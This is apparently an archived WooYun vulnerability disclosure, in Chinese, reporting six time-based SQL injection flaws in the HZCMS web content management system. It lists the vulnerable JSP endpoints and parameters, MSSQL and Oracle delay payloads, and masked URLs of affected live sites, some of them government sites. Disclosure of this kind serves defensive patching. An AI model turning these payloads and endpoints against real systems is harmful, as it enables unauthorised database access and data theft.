合正协同内容管理系统6个SQL注入 | wooyun-2015-0145426| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145426

漏洞标题：合正协同内容管理系统6个SQL注入

漏洞作者：路人甲

提交时间：2015-10-09 15:31

修复时间：2016-01-11 17:54

公开时间：2016-01-11 17:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-09：细节已通知厂商并且等待厂商处理中
2015-10-13：厂商已经确认，细节仅向厂商公开
2015-10-16：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2015-12-07：细节向核心白帽子及相关领域专家公开
2015-12-17：细节向普通白帽子公开
2015-12-27：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

现在挖漏洞都不是挖了，而是打包了

详细说明：

　北京合正软件有限公司开发的合正网站群内容管理系统HZCMS是一套基于Java和XML技术的网站群内容管理软件，基于面向服务体系架构设计和平台化、组件化的模式开发，实现了网站内容的采集、编辑、制作、管理、发布、运营和分析的全流程管理,可以轻松灵活建立政府和企业站点群，集中管理，分级授权，支持站群间的信息交换和共享。系统既适用于独立的网站建设，又支持多级别、横向或纵向的虚拟网站群，并在技术上实现了多网站之间多数据库管理，彻底解决了组织对内、对外、本地与异地、多部门、多网站之间的网络互通、内容整合；加快了信息、内容、知识的积累和流通，使得非专业人员协同、高效、简单、智能的维护管理站点群。　　　　
　官网列举的部分案例：[官网只是枚举部分，实际案例不止这些，有很多！] 比如：用友软件、国家奥林匹克体育中心、中国物流信息中心河南省统计局、河南省交通厅、河南省财政厅等大型站点。

后台：

SQL Injection:[数据有MSSQL和Oracle两种，基本都支持时间注入]

1、/cms/cms/infopub/gjjs.jsp    templetid参数存在注入
2、/cms/cms/infopub/search.jsp  templetid参数存在注入
3、/cms/ad/openad.jsp?adid=1    adid参数存在注入
4、/cms/cms/infopub/rss.jsp     channelcode参数存在注入
5、/cms/wcmvote/viewvote.jsp    voteId参数存在注入
6、/cms/cms/infopub/resultmulfields.jsp templetid参数存在注入

测试Payload:

MSSQL延迟测试：' WAITFOR DELAY '0:0:5'--
Oracle延迟测试：' AND 8880=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(112)||CHR(106)||CHR(107),5) AND 'bHxV'='bHxV

Case:

mask 区域

*****案^*****
1.http://**.**.**/cms/cms/infopub/gjjs.jsppubtype=S&pubpath=dkt&startdate=111111&enddate=111111topic=11111&content=11111&authorname=11111&origin=111111&description=84&webappcode=A02&searchdir=A02&templetid=1_
2.http://**.**.**/cms/cms/infopub/gjjs.jsppubtype=S&pubpath=dkt&startdate=111111&enddate=111111topic=11111&content=11111&authorname=11111&origin=111111&description=84&webappcode=A02&searchdir=A02&templetid=1_
*****11&content=11111&authorname=11111&origin=111*****
3.http://**.**.**/cms/cms/infopub/gjjs.jsppubtype=S&pubpath=dkt&startdate=111111&enddate=111111topic=11111&content=11111&authorname=11111&origin=111111&description=84&webappcode=A02&searchdir=A02&templetid=1_
4.http://**.**.**/cms/cms/infopub/gjjs.jsppubtype=S&pubpath=dkt&startdate=111111&enddate=111111topic=11111&content=11111&authorname=11111&origin=111111&description=84&webappcode=A02&searchdir=A02&templetid=1_
**********
*****案^*****
5.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
6.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
7.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
8.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
9.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
**********
*****案^*****
10.http://**.**.**/cms/ad/openad.jspadid=1_
11.http://**.**.**/cms/ad/openad.jspadid=1_
*****d/openad.*****
12.http://**.**.**/cms/ad/openad.jspadid=1_
13.http://**.**.**/cms/ad/openad.jspadid=1_
**********
*****案^*****
14.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=A1228&maxnum=20_
15.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=1&maxnum=20_
16.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=1&maxnum=20_
17.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=1&maxnum=20_
18.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=1&maxnum=20_
**********
**********
*****案^*****
19.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
20.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
21.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
22.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
23.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
**********
*****案^*****
24.http://**.**.**/cms/cms/infopub/resultmulfields.jsppubtype=S&cxfld=a3%5E&pubpath=portal&keywords=%BB%DD%C6%D5%5E&channel=A0804&templetid=1213354216336211_
25.http://**.**.**/cms/cms/infopub/resultmulfields.jsppubtype=S&startdate=startdate&enddate=enddate&newkeywords=&cxfld=a1%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9%DC%B2%C4%D3%EB%B9%DC%BC%FE%5Enull%5E&channel=A480301&templetid=1423723308286499_
26.http://**.**.**/cms/cms/infopub/resultmulfields.jsppubtype=S&startdate=startdate&enddate=enddate&newkeywords=&cxfld=a1%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9%DC%B2%C4%D3%EB%B9%DC%BC%FE%5Enull%5E&channel=A480301&templetid=1423723308286499_
*****%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9*****
27.http://**.**.**/cms/cms/infopub/resultmulfields.jsppubtype=S&startdate=startdate&enddate=enddate&newkeywords=&cxfld=a1%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9%DC%B2%C4%D3%EB%B9%DC%BC%FE%5Enull%5E&channel=A480301&templetid=1423723308286499

漏洞证明：

Security Testing:
本页漏洞内容仅为漏洞报告交由CNCERT/CNVD通知厂商处理，并非利用方法，请勿仿照漏洞报告进行恶意攻击入侵站点，由此带来的后果，漏洞作者概不负责！

第一处证明：/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=111111&enddate=111111&topic=111111&content=111111&authorname=111111&origin=111111&description=111111&webappcode=A02&searchdir=A02&templetid=1241486749927709 












第二处证明：/cms/cms/infopub/search.jsp?pubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1















第三处证明：/cms/ad/openad.jsp?adid=1















第四处证明：/cms/cms/infopub/rss.jsp?channelcode=A1228&maxnum=20










第五处证明：/cms/wcmvote/viewvote.jsp?voteId=1















第六处证明：/cms/cms/infopub/resultmulfields.jsp?pubtype=S&startdate=startdate&enddate=enddate&newkeywords=&cxfld=a1%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9%DC%B2%C4%D3%EB%B9%DC%BC%FE%5Enull%5E&channel=A480301&templetid=1